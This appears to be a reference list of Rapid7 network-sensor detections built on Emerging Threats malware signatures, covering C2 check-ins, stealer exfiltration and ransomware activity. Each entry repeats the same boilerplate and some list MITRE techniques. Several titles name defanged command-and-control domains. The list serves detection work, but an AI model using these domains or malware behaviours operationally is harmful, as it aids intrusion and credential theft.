ET MALWARE Win32/Agent.WVW CnC Beacon 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Agent.XST Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Agent.XST/UP007 Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Alpha Stealer v1.5 PWS Exfil via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Androm.gnlb Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AnteFrigus Ransomware Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Arkei Stealer CnC Checkin (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Arkei Stealer CnC Checkin (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArmyOfUkraine Bot Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArtraDownloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ArtraDownloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ASPC Bot CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Aura Ransomware CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/AutoIt.NU Miner Dropper CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (tpddata .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .anlway .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .ap8898 .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Autophyte.F C2 Domain (www .apshenyihl .com in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Avaddon Ransomware Style External IP Address Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/AZORult V3.2 Client Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M10

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M11

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M12

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M13

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M14

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M15

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M16

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M17

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M18

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M19

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M20

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M21

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M22

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M23

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M24

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.2 Client Checkin M9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M10

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M11

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M12

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M13

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M14

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M15

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M16

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M17

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M18

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M19

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M20

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M21

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M22

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M23

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M24

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/AZORult V3.3 Client Checkin M9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Agent.qweydh CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor Checkin (POST)

Description

Recommendation

ET MALWARE Win32/Backdoor.Daxin CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Dripion External IP Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Dripion HTTP CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Graphon Checkin Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.Randrew.A CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor Retrieving Task (POST)

Description

Recommendation

ET MALWARE Win32/Backdoor Sending Task Status (POST)

Description

Recommendation

ET MALWARE Win32/Backdoor.Small.ao CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Backdoor.YesMaster CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bancos.AMM CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Bancos URL Structure

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banker.bqba Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banload.BTQP Checkin 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Banload.BTQP Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BanloadDownloader.XZY Retrieving Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BazarLoader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Beapy/Lemon_Duck CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Beaugrit.gen.AAAA

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Bicololo Response 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Bicololo Response 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal Backdoor CnC Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bisonal RC4 Encrypted 8 Byte Static CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Blackbeard Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Keep-Alive

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BlackNET CnC Requesting Command

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BLUELIGHT OAuth Login Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/BLUELIGHT OAuth Login Attempt M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Bot.Sezin CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Braincrypt Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/CandyOpen/UniClient Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CandyOpen/UniClient Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Chinad Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Chinad Retrieving Config

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CHIP Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32.Chroject.B ClickFraud Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Chroject.B Requesting ClickFraud Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Chroject.B Retrieving encoded payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ClipBanker.OC CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ClipBanker.OC CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32 Cloaker Related Post Infection Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Colibri Loader Activity M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer CnC Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/CollectorStealer CnC Exfil M3

Description

